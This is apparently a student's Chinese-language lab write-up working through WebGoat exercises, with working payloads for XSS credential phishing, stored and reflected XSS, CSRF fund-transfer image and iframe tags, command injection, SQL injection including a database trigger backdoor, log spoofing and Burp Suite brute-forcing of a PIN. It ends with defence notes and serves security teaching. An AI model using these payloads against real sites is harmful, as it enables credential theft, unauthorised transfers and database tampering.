#20155232《网络对抗》Exp9 Web安全基础

Posted 短爪爪爪

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了#20155232《网络对抗》Exp9 Web安全基础相关的知识,希望对你有一定的参考价值。

20155232《网络对抗》Exp9 Web安全基础

本实践的目标理解常用网络攻击技术的基本原理。Webgoat实践下相关实验。

实验过程

WebGoat

Webgoat是OWASP组织研究出的一个专门进行web漏洞实验的应用品台,这个平台里包含了web中常见的各种漏洞,例如:跨站脚本攻击、sql注入、访问控制、隐藏字段、Cookie等;

OWASP(Open Web Application Security Project)是一个非营利的组织,它的目的是帮助个人和企业来发现和使用可信赖的软件。

  • WebGoat分为简单版和开发板,简单版是个Java的Jar包,只需要有Java环境即可,我们在命令行里执行:
java -jar webgoat-container-7.0.1-war-exec.jar

运行WebGoat:

  • WebGoat使用8080端口,所以在浏览器上访问

注意W G大写。

localhost:8080/WebGoat

进入WebGoat之后,可以看到有很多题目来让我们进行练习:

Cross-Site Scripting练习

Phishing with XSS

这是跨站脚本钓鱼攻击,要求在搜索框中输入XSS攻击代码,利用XSS可以在已存在的页面中进一步添加元素的特点

创建一个form,让受害人在创建的form中填写用户名和密码,再添加一段javascript代码,读取受害人输入的用户名和密码,并且将这些信息发送给http://localhost:8080/WebGoat/catcher?PROPERTY=yes...,

</form>
<script>
    function hack(){ 
        XSSImage=new Image;
        XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
        alert(".....your information was stolen by lsq! User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
    } 
</script>
<form name="phish">
<br>
<br>
<HR>
    <H2>please input your information here:</H2>
<br>
    <br>Enter Username:<br>
    <input type="text" name="user">
    <br>Enter Password:<br>
    <input type="password" name = "pass">
<br>
    <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
  • 输入用户名密码,点击登录,WebGoat会将你输入的信息捕获并反馈给你:

  • 攻击成功~~~。。。。。:

Stored XSS Attacks

  • 储存型XSS攻击:XSS攻击代码存储于数据库中,每次当用户打开此网页时便会执行,危害大,常用语留言板,每次当用户查看留言信息时即触发。导致用户访问时载入非预期的页面或内容

  • 在title里随便输入某些内容

  • 然后在message中输入一串代码,比如:

<script>alert(" you have been attacked by lsq !!");</script>

  • 当用户在论坛中点击刚刚创建的帖子后:
  • 成功进行了攻击:

Reflected XSS Attacks

  • 存储型XSS与反射型XSS有什么区别?

存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。

反射型XSS,非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。

  • 这里练习的具体解释:

在服务器端验证所有输入始终是一个很好的做法。当在HTTP响应中使用未经验证的用户输入时,可能发生XSS。在一个反射的XSS攻击中,攻击者可以用攻击脚本制作URL并将其张贴到另一个网站上,发送电子邮件,或者以其他方式让受害者点击它。

  • 当我们输入错误用户信息后,服务器校验输入有误,返回错误页面并将错误内容展示给我们看:

  • 这时如果我们将带有攻击性的URL作为输入源,例如依旧输入

<script>alert(" you have been attacked by lsq !!!");</script>

,就会弹出对话框:

Cross Site Request Forgery(CSRF)

这里练习的目标是发送电子邮件到新闻组。电子邮件包含一个图像,其URL指向恶意请求。在本课中,URL应该指向“攻击”Servlet,该课程的“屏幕”和“菜单”参数和一个额外的参数“TrimeFund”具有任意数值,如5000。您可以通过在右边插入的参数中找到“屏幕”和“菜单”值来构建链接。当时被认证的CSRF邮件的收件人将转移他们的资金。当这一课的攻击成功时,左边的菜单旁边出现一个绿色的复选标记。

  • 以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件。

  • 我们在message框中输入这样一串代码

<img src=\'attack?Screen=277&menu=900&transferFunds=5000\' width=\'1\' height=\'1\'>

注意这里面的Screen和menu的值每个人的电脑可能不一样,可以在当前页面的右边有个Parameters进行查看,然后通过宽高设置成1像素,隐藏掉这个图片。

  • 提交后,会在消息列表中看到一个新的消息,点击该消息,当前页面就会下载这个消息并显示出来,转走用户的5000元,从而达到CSRF攻击的目的。

CSRF Prompt By-Pass

目标是向包含多个恶意请求的新闻组发送电子邮件:第一个转移资金,第二个请求确认第一个请求被触发的提示。URL应该指向这个CSRF提示的攻击servlet,通过PASS课程的屏幕、菜单参数和一个额外的参数“TrimeBoover”,它具有一个数字值,比如“5000”来启动一个传输,一个字符串值“确认”完成它。您可以从右边的插图复制该课程的参数,创建“攻击”格式的URL。屏幕= xxx和菜单= yyy和转移资金= ZZZ”。无论谁收到这封电子邮件,恰巧在那时被认证,他的资金将被转移。当您认为攻击成功时,刷新页面,您将在左侧菜单中找到绿色检查

  • 查看页面右边Parameters中的src和menu值。

  • 在message中添加代码:



<iframe src="attack?Screen=src值&menu=menu值&transferFunds=转账数额"> </iframe>
<iframe src="attack?Screen=src值&menu=menu值&transferFunds=CONFIRM"> </iframe>

  • 提交后生成一个链接,点击:

或者!

  • 在浏览器中手动输入URL
localhost:8080/WebGoat/attack?Screen=266&menu=900&transferFunds=5000

进入确认转账请求页面:

  • 点击CONFIRM按钮之后,再在浏览器中输入URL:
localhost:8080/WebGoat/attack?Screen=266&menu=900&transferFunds=CONFIRM

成功转走了5000元:

Injection Flaws练习

SQL注入攻击对任何数据库驱动的站点都构成严重威胁。攻击背后的方法很容易学习,造成的损害可以从相当大到完全的系统妥协。尽管存在这些风险,但互联网上令人难以置信的系统数量易受这种攻击形式的影响。

对所有输入数据进行清理,尤其是在OS命令、脚本和数据库查询中使用的数据,以某种其他方式阻止SQL注入的威胁,也是很好的做法。

Command Injection

  • 在目标主机上执行系统命令,通过火狐浏览器下的Firebug对源代码进行修改,在BackDoors.help旁边加上
"& netstat -an & ipconfig"

  • 之后在下拉菜单中能看到我们修改后的值:

  • 选中修改后的值再点view,可以看到命令被执行,出现系统网络连接情况:

Numeric SQL Injection

  • 题目要求:
    下面的表单允许用户查看天气数据。尝试注入导致所有天气数据显示的SQL字符串。
    现在,您已经成功执行SQL注入,尝试对参数化查询进行相同类型的攻击。

  • 加上一个1=1这种永真式即可达到我们的目的,依旧利用firebug,在任意一个值比如101旁边加上or 1=1:

  • 选中Columbia,点Go,出现:

Log Spoofing

  • 我们输入的用户名会被追加到日志文件中,所以我们可以使用障眼法来使用户名为“admin”的用户在日志中显示“成功登录”,在User Name文本框中输入
lsq%0d%0aLogin Succeeded for username: admin

其中%0d是回车,%0a是换行符:

  • 如图所示,攻击成功:

String SQL Injection

  • 这里和之前一样,基于select语句构造SQL注入字符串,在文本框中输入
\' or 1=1 --

第一个分号用来闭合last_name的第一个分号,而第二个分号用来闭合last_name的第二个分号。将一条语句被强行拆分成为两条语句。

  • 点Go,攻击成功,所有用户信息都被显示出来:

LAB:SQL Injection(Stage 1:String SQL Injection)

  • 以用户larry登录,在密码栏中输入
\' or 1=1 --

进行SQL注入,但是登录失败:

  • 查看网页代码后发现这里设定的长度不够。然后进行修改:

  • 成功哈:

SQL Injection(Stage 3:Numeric SQL Injection)

  • 跟之前是一样的方法,然后点击ViewProfile可以浏览员工信息:

  • 使用inspect分析一下这个按钮,发现这个地方是以员工ID作为索引传递参数的,我们要达到通过Larry来浏览老板账户信息的目的,一般来说老板的工资都应该是最高的,所以把其中的value值改为

101 or 1=1 order by salary desc --

这里desc是指工资按降序排序,这样老板的信息就会被排到第一个。

  • 之后就可以查看到老板的信息:

Database Backdoors

  • 先输一个101,得到了该用户的信息:

  • 输入注入语句:
101; update employee set salary=90000

成功把该用户的工资涨到了90000:

  • 然后使用语句
101;CREATE TRIGGER lsqBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=\'20155232@qq.com\' WHERE userid = NEW.userid

Blind Numeric SQL Injection

  • 我们的目标是找到pins表中cc_number字段值为1111222233334444的记录中pin字段的数值,从服务端页面返回的信息中可以知道,它只告诉你两种信息:帐号有效或无效,我们可以先输入语句
101 AND ((SELECT pin FROM pins WHERE cc_number=\'1111222233334444\') > 10000 );

查看pin数值是否大于10000

  • 后来确定在2000到2500之间,然后打开BurpSuite。

  • 设置:

  • 启动BurpSuite

  • 设置代理“Proxy”的“Options”选项
    默认是8080端口被占用时需要添加一个新的端口5232,点击add

  • 添加后勾选,如图所示

  • 设置浏览器的代理

  • 打开浏览器右侧的“更多”选项卡,找到preference-advanced-settings

当于将burpsuite当成中间服务器,每个数据包都流过它。设置好之后回到题目,任意选择一项,点击GO,然后回到burpsuite。发现多了捕获的包:

  • 在Positions中,选择Sniper模式,然后用光标选中需要暴力穷举的变量,在此处是account_number后的值,然后点击右侧的add添加(在此之前点击clear清空所有的)

  • 在Payloads中,选择type类型为number,然后设置变化范围2000-2500,并设置步长为1

  • 在Options中,选择Start attack开始攻击

在这里找到数据包大小变化的位置2364,用2364试一下:

在关闭了burpsuite之后,把浏览器的代理调回不使用代理,否则浏览器上不了网

实验后回答问题

(1)SQL注入攻击原理,如何防御

SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的。

1、 普通用户与系统管理员用户的权限要有严格的区分。

2、 强迫使用参数化语句。

3、 加强对用户输入的验证。

4、使用SQL Server数据库自带的安全参数。

5、使用正则表达式过滤传入的参数,对一些包含sql注入的关键字进行过滤。

6、jsp中调用该函数检查是否包含非法字符,防止SQL从URL注入。

(2)XSS攻击的原理,如何防御

XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器
执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列
表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等。

1、在表单提交或者url参数传递前,对需要的参数进行过滤。

2、过滤用户输入的检查用户输入的内容中是否有非法内容。如<>(尖括号)、”(引号)、 ‘(单引号)、%(百分比符号)、;(分号)、()(括号)、&(& 符号)、+(加号)等。严格控制输出

(3)CSRF攻击原理,如何防御

跨站请求伪造,盗用身份发送恶意请求。

1、验证 HTTP Referer 字段

2、在请求地址中添加 token 并验证

3、在 HTTP 头中自定义属性并验证

实验总结与体会

这次实验很有意思,题目中会结合一些实际的例子,进行攻击。也学习到了很多攻击类型,更加深入的了解很多。在使用BurpSuite捕获包进行源码修改的方法时,遇到了很多问题,这个软件都是英文版本,所以用起来真的很费劲,看了很多学长学姐的博客,才慢慢拼凑起来,慢慢学会使用。另一种方法直接使用Firebug修改网页源码,要更容易一些,但是可用范围就要小了一些了。

以上是关于#20155232《网络对抗》Exp9 Web安全基础的主要内容,如果未能解决你的问题,请参考以下文章

20155308《网络对抗》Exp9 Web安全基础实践

2018-2019-2 20165204《网络对抗技术》 Exp9 Web安全基础

2018-2019-2 网络对抗技术 20165324 Exp9: Web安全基础

20145236《网络对抗》Exp9 web安全基础实践

# 20155337《网络对抗》Exp9 Web安全基础

20155207 《网络对抗》 Exp9 Web安全基础